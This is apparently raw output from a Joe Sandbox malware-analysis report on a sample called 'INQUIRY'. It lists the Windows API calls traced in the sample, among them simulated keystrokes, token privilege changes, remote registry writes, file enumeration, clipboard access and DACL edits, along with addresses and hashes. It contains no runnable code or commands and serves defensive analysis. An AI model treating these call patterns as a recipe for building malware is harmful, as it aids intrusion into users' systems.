                                                                                              • Sleep.KERNELBASE(000001F4), ref: 01DA22B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 01DA22B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A9CB37
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A9CB95
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A9CBD6
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A9CC00
                                                                                              • SendMessageW.USER32 ref: 00A9CC29
                                                                                              • _wcsncpy.LIBCMT ref: 00A9CC95
                                                                                              • GetKeyState.USER32(00000011), ref: 00A9CCB6
                                                                                              • GetKeyState.USER32(00000009), ref: 00A9CCC3
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A9CCD9
                                                                                              • GetKeyState.USER32(00000010), ref: 00A9CCE3
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A9CD0C
                                                                                              • SendMessageW.USER32 ref: 00A9CD33
                                                                                              • SendMessageW.USER32(?,00001030,?,00A9B348), ref: 00A9CE37
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A9CE4D
                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A9CE60
                                                                                              • SetCapture.USER32(?), ref: 00A9CE69
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A9CECE
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A9CEDB
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A9CEF5
                                                                                              • ReleaseCapture.USER32 ref: 00A9CF00
                                                                                              • GetCursorPos.USER32(?), ref: 00A9CF3A
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A9CF47
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A9CFA3
                                                                                              • SendMessageW.USER32 ref: 00A9CFD1
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A9D00E
                                                                                              • SendMessageW.USER32 ref: 00A9D03D
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A9D05E
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A9D06D
                                                                                              • GetCursorPos.USER32(?), ref: 00A9D08D
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A9D09A
                                                                                              • GetParent.USER32(?), ref: 00A9D0BA
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A9D123
                                                                                              • SendMessageW.USER32 ref: 00A9D154
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A9D1B2
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A9D1E2
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A9D20C
                                                                                              • SendMessageW.USER32 ref: 00A9D22F
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A9D281
                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A9D2B5
                                                                                                • Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A9D351
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3977979337-4164748364
                                                                                              • Opcode ID: 1afc19769ff2e22d06f415048cc7cc8b0e4ff6441eba78aaca1d69c0cebd0aa5
                                                                                              • Instruction ID: 68947b57397b96de7f21211e651ff29b2ed7d0a611054b65780167265cdc9449
                                                                                              • Opcode Fuzzy Hash: 1afc19769ff2e22d06f415048cc7cc8b0e4ff6441eba78aaca1d69c0cebd0aa5
                                                                                              • Instruction Fuzzy Hash: E3429C74704781AFDB24CF68C844AAABBE5FF49360F14091AF656CB2B0DB31D891DB52
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_memset
                                                                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                              • API String ID: 1357608183-1798697756
                                                                                              • Opcode ID: 0d7c423997226a133f261d74addcb2fb6806e207caa5754953e64c5214beef08
                                                                                              • Instruction ID: 84a9099acb301608fa7f48adc57330b1db133e3e7ecf2e1e870ce10d5b7990d5
                                                                                              • Opcode Fuzzy Hash: 0d7c423997226a133f261d74addcb2fb6806e207caa5754953e64c5214beef08
                                                                                              • Instruction Fuzzy Hash: D393A075E04219DFDF24CF98D881BADB7B1FF48710F25816AE945AB281E7749E82CB40
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(00000000,?), ref: 00A148DF
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A4D665
                                                                                              • IsIconic.USER32(?), ref: 00A4D66E
                                                                                              • ShowWindow.USER32(?,00000009), ref: 00A4D67B
                                                                                              • SetForegroundWindow.USER32(?), ref: 00A4D685
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A4D69B
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A4D6A2
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A4D6AE
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4D6BF
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4D6C7
                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00A4D6CF
                                                                                              • SetForegroundWindow.USER32(?), ref: 00A4D6D2
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D6E7
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00A4D6F2
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D6FC
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00A4D701
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D70A
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00A4D70F
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D719
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00A4D71E
                                                                                              • SetForegroundWindow.USER32(?), ref: 00A4D721
                                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00A4D748
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 4125248594-2988720461
                                                                                              • Opcode ID: 36f019163bebf64d7dd92ce948501e0178ebd59c6fbb639e69216d89f6e7bf0a
                                                                                              • Instruction ID: 40f9481ed286a8e266049b0eafe259a9de5475df33d068110a7bdff49d217666
                                                                                              • Opcode Fuzzy Hash: 36f019163bebf64d7dd92ce948501e0178ebd59c6fbb639e69216d89f6e7bf0a
                                                                                              • Instruction Fuzzy Hash: F3315575B403187FEB205BA19C49F7F7E6CEB44B50F114026FA05EA1D1CAB05951AAA1
                                                                                              APIs
                                                                                                • Part of subcall function 00A687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
                                                                                                • Part of subcall function 00A687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
                                                                                                • Part of subcall function 00A687E1: GetLastError.KERNEL32 ref: 00A68865
                                                                                              • _memset.LIBCMT ref: 00A68353
                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A683A5
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A683B6
                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A683CD
                                                                                              • GetProcessWindowStation.USER32 ref: 00A683E6
                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 00A683F0
                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A6840A
                                                                                                • Part of subcall function 00A681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A68309), ref: 00A681E0
                                                                                                • Part of subcall function 00A681CB: CloseHandle.KERNEL32(?,?,00A68309), ref: 00A681F2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                              • String ID: $default$winsta0
                                                                                              • API String ID: 2063423040-1027155976
                                                                                              • Opcode ID: 453b67758c6a66478b58ea06f4d94b4528027eb614916cd54863181a8ac3eefa
                                                                                              • Instruction ID: 0c47181164a22bad72af8810a3a48c4454a7f89e6926b00fa6b11351df753422
                                                                                              • Opcode Fuzzy Hash: 453b67758c6a66478b58ea06f4d94b4528027eb614916cd54863181a8ac3eefa
                                                                                              • Instruction Fuzzy Hash: 61816B71900249AFDF11DFA4CD49AEEBBBCFF04304F14426AF915A62A1DB398E15DB20
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A7C78D
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7C7E1
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A7C806
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A7C81D
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A7C844
                                                                                              • __swprintf.LIBCMT ref: 00A7C890
                                                                                              • __swprintf.LIBCMT ref: 00A7C8D3
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • __swprintf.LIBCMT ref: 00A7C927
                                                                                                • Part of subcall function 00A33698: __woutput_l.LIBCMT ref: 00A336F1
                                                                                              • __swprintf.LIBCMT ref: 00A7C975
                                                                                                • Part of subcall function 00A33698: __flsbuf.LIBCMT ref: 00A33713
                                                                                                • Part of subcall function 00A33698: __flsbuf.LIBCMT ref: 00A3372B
                                                                                              • __swprintf.LIBCMT ref: 00A7C9C4
                                                                                              • __swprintf.LIBCMT ref: 00A7CA13
                                                                                              • __swprintf.LIBCMT ref: 00A7CA62
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                              • API String ID: 3953360268-2428617273
                                                                                              • Opcode ID: aeed4d3e7f8450aa3da16fb7b065ce4f162e4bf7cd9fda8f1269b506cd0532b2
                                                                                              • Instruction ID: ac8934d7c78dc8ab1e09ac95fc68cc66c1a87edf1d0673b097ea71ea19661054
                                                                                              • Opcode Fuzzy Hash: aeed4d3e7f8450aa3da16fb7b065ce4f162e4bf7cd9fda8f1269b506cd0532b2
                                                                                              • Instruction Fuzzy Hash: 45A11BB2508204ABC710EFA4C996DEFB7ECBF98700F40491EF595C6191EB34DA49CB62
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A7EFB6
                                                                                              • _wcscmp.LIBCMT ref: 00A7EFCB
                                                                                              • _wcscmp.LIBCMT ref: 00A7EFE2
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00A7EFF4
                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00A7F00E
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00A7F026
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F031
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00A7F04D
                                                                                              • _wcscmp.LIBCMT ref: 00A7F074
                                                                                              • _wcscmp.LIBCMT ref: 00A7F08B
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A7F09D
                                                                                              • SetCurrentDirectoryW.KERNEL32(00AC8920), ref: 00A7F0BB
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7F0C5
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F0D2
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7F0E4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1803514871-438819550
                                                                                              • Opcode ID: 1bf5dc5e44569686c0d538b62c3abc8b6448824b19b4843d3036cd006ca0dd52
                                                                                              • Instruction ID: 4553ada9903c32119d5d8be0913791287cd654b85b967a36e5de08e8db18997f
                                                                                              • Opcode Fuzzy Hash: 1bf5dc5e44569686c0d538b62c3abc8b6448824b19b4843d3036cd006ca0dd52
                                                                                              • Instruction Fuzzy Hash: D73180326012197EDF14DBB4EC49AEE77ACAF48360F148176E818D3191EB74DB46CA61
                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A90953
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A9F910,00000000,?,00000000,?,?), ref: 00A909C1
                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A90A09
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A90A92
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A90DB2
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A90DBF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 536824911-966354055
                                                                                              • Opcode ID: e08cc3061b9eae5733d6697267673fce5cd15573410487be7a218fa541c8d46b
                                                                                              • Instruction ID: 77337c2280024e4d92c9eadad9dde14ead04a3bd320ab7273f8a856b56994f20
                                                                                              • Opcode Fuzzy Hash: e08cc3061b9eae5733d6697267673fce5cd15573410487be7a218fa541c8d46b
                                                                                              • Instruction Fuzzy Hash: D90269756006119FCB14EF28C991E6AB7E9FF89314F04885DF89A9B362DB30ED41CB81
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A7F113
• _wcscmp.LIBCMT ref: 00A7F128
• _wcscmp.LIBCMT ref: 00A7F13F
  • Part of subcall function 00A74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A743A0
• FindNextFileW.KERNEL32(00000000,?), ref: 00A7F16E
• FindClose.KERNEL32(00000000), ref: 00A7F179
• FindFirstFileW.KERNEL32(*.*,?), ref: 00A7F195
• _wcscmp.LIBCMT ref: 00A7F1BC
• _wcscmp.LIBCMT ref: 00A7F1D3
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A7F1E5
• SetCurrentDirectoryW.KERNEL32(00AC8920), ref: 00A7F203
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7F20D
• FindClose.KERNEL32(00000000), ref: 00A7F21A
• FindClose.KERNEL32(00000000), ref: 00A7F22C
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A7A20F
• __swprintf.LIBCMT ref: 00A7A231
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00A7A26E
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A7A293
• _memset.LIBCMT ref: 00A7A2B2
• _wcsncpy.LIBCMT ref: 00A7A2EE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A7A323
• CloseHandle.KERNEL32(00000000), ref: 00A7A32E
• RemoveDirectoryW.KERNEL32(?), ref: 00A7A337
• CloseHandle.KERNEL32(00000000), ref: 00A7A341
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
APIs
  • Part of subcall function 00A68202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A6821E
  • Part of subcall function 00A68202: GetLastError.KERNEL32(?,00A67CE2,?,?,?), ref: 00A68228
  • Part of subcall function 00A68202: GetProcessHeap.KERNEL32(00000008,?,?,00A67CE2,?,?,?), ref: 00A68237
  • Part of subcall function 00A68202: HeapAlloc.KERNEL32(00000000,?,00A67CE2,?,?,?), ref: 00A6823E
  • Part of subcall function 00A68202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A68255
  • Part of subcall function 00A6829F: GetProcessHeap.KERNEL32(00000008,00A67CF8,00000000,00000000,?,00A67CF8,?), ref: 00A682AB
  • Part of subcall function 00A6829F: HeapAlloc.KERNEL32(00000000,?,00A67CF8,?), ref: 00A682B2
  • Part of subcall function 00A6829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A67CF8,?), ref: 00A682C3
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A67D13
• _memset.LIBCMT ref: 00A67D28
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A67D47
• GetLengthSid.ADVAPI32(?), ref: 00A67D58
• GetAce.ADVAPI32(?,00000000,?), ref: 00A67D95
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A67DB1
• GetLengthSid.ADVAPI32(?), ref: 00A67DCE
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A67DDD
• HeapAlloc.KERNEL32(00000000), ref: 00A67DE4
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A67E05
• CopySid.ADVAPI32(00000000), ref: 00A67E0C
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A67E3D
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A67E63
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A67E77
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
Similarity
• API ID:
• String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
• API String ID: 0-4052911093
APIs
• GetKeyboardState.USER32(?), ref: 00A70097
• SetKeyboardState.USER32(?), ref: 00A70102
• GetAsyncKeyState.USER32(000000A0), ref: 00A70122
• GetKeyState.USER32(000000A0), ref: 00A70139
• GetAsyncKeyState.USER32(000000A1), ref: 00A70168
• GetKeyState.USER32(000000A1), ref: 00A70179
• GetAsyncKeyState.USER32(00000011), ref: 00A701A5
• GetKeyState.USER32(00000011), ref: 00A701B3
• GetAsyncKeyState.USER32(00000012), ref: 00A701DC
• GetKeyState.USER32(00000012), ref: 00A701EA
• GetAsyncKeyState.USER32(0000005B), ref: 00A70213
• GetKeyState.USER32(0000005B), ref: 00A70221
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
  • Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A904AC
  • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
  • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A9054B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A905E3
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A90822
• RegCloseKey.ADVAPI32(00000000), ref: 00A9082F
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
APIs
  • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
  • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
• CoInitialize.OLE32 ref: 00A88403
• CoUninitialize.OLE32 ref: 00A8840E
• CoCreateInstance.OLE32(?,00000000,00000017,00AA2BEC,?), ref: 00A8846E
• IIDFromString.OLE32(?,?), ref: 00A884E1
• VariantInit.OLEAUT32(?), ref: 00A8857B
• VariantClear.OLEAUT32(?), ref: 00A885DC
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: b5fa6c38dc07309f43f506a7ac0532cbd5576ac0e1b43c2a369a71a967b36df2
• Instruction ID: eba458984965f7596c1c7e701b0f631cce6256b1a6b4fd2744ed46442556a091
• Opcode Fuzzy Hash: b5fa6c38dc07309f43f506a7ac0532cbd5576ac0e1b43c2a369a71a967b36df2
• Instruction Fuzzy Hash: A22171357012119FDB10AFA4DD19BAA7BA8FF05751F108026FA46DB261DB30AD42CB54
APIs
  • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
